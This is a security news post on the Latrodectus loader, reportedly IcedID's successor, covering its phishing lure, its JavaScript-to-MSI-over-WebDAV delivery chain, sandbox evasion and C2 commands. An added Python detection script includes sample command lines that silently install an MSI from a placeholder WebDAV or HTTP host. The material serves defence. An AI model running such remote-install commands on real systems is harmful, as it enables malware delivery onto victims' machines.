Friday, April 5, 2024

New Malware Alert: Latrodectus Emerges as IcedID's Evolution

A recently discovered malware named Latrodectus is believed to be an advanced version of the IcedID loader, which has been causing trouble in malicious email campaigns since November 2023.

Researchers from Proofpoint and Team Cymru uncovered this new threat, noting that its capabilities are still experimental and not fully stable.

IcedID, initially identified in 2017 as a banking trojan, evolved over time to become a sophisticated loader that can deliver various types of malware, including ransomware, to infected systems.

In February 2024, a key figure in the IcedID operation pleaded guilty in the United States and faces a lengthy prison sentence. Researchers now suspect, based on shared infrastructure and operational similarities, that the creators of IcedID developed Latrodectus.


Although it's too early to say whether Latrodectus will replace IcedID, initial findings indicate that threat actors previously associated with IcedID are now increasingly using Latrodectus in their phishing campaigns. Latrodectus first appeared in November 2023, with a noticeable uptick in deployments in February and March 2024. Threat actors initiate attacks by sending fake copyright infringement notices via online contact forms to targeted organizations.


These phishing emails can be alarming to recipients, potentially leading them to click on embedded links. In the latest campaigns, victims are directed to a Google Firebase URL, which drops a JavaScript file. Upon execution, the JS file uses Windows Installer to run an MSI file, served from a WebDAV share, that contains the Latrodectus DLL payload.
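Detection logic for the delivery chain just described, as an added example that is not part of the original post or of the Proofpoint/Team Cymru research: it scans constructed process-creation records for msiexec.exe launched by a script host with a WebDAV or HTTP package source. Field names follow Sysmon Event ID 1 conventions; the hosts and paths are placeholders.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (Sysmon Event ID 1 style),
# not real telemetry. Hostnames and paths are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" C:\Users\u\Downloads\notice.js'},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"msiexec.exe /i \\webdav.example.invalid@SSL\DavWWWRoot\pkg\update.msi /qn"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"msiexec.exe /i http://webdav.example.invalid/pkg/update.msi /q"},
    # Benign: an interactive install of a locally downloaded package.
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\u\Downloads\vendor.msi"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

# A remote package source: a UNC path (WebDAV shares appear as
# \\host@SSL\DavWWWRoot\...), an HTTP(S) URL, or the DavWWWRoot marker.
REMOTE_SOURCE = re.compile(r"(\\\\[^\s\\]+\\|https?://|davwwwroot)", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_suspicious_msi_launch(event: Dict[str, str]) -> bool:
    """True when msiexec.exe is spawned by a script host and its package
    comes from a remote (WebDAV/HTTP) location, as in the chain above."""
    if basename(event.get("Image", "")) != "msiexec.exe":
        return False
    remote = REMOTE_SOURCE.search(event.get("CommandLine", "")) is not None
    scripted = basename(event.get("ParentImage", "")) in SCRIPT_HOSTS
    return remote and scripted


def find_suspicious(events: List[Dict[str, str]]) -> List[str]:
    """Return the command lines of all events matching the detection."""
    return [e["CommandLine"] for e in events if is_suspicious_msi_launch(e)]


if __name__ == "__main__":
    for cmd in find_suspicious(SAMPLE_EVENTS):
        print("ALERT: scripted remote MSI install:", cmd)
```

The parent-process condition is what keeps ordinary software deployments from a file share out of the alert; drop it only if script-host telemetry is unavailable and accept the extra noise.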


Unlike IcedID, Latrodectus performs various sandbox evasion checks before running on a device, making it harder for security researchers to detect and analyze.


After initialization, Latrodectus communicates with its operators and acts as a downloader for further malicious payloads, based on commands received from a command and control (C2) server.


The malware supports various commands, including retrieving file names, obtaining a list of running processes, executing files, and downloading additional payloads.


Latrodectus operates with a dynamic infrastructure approach, with most new C2 servers coming online towards the end of the week before attacks.


Proofpoint warns of the high probability of Latrodectus being utilized by multiple threat actors in the future, especially those previously associated with IcedID. Vigilance and updated security measures are crucial to mitigate this emerging threat.
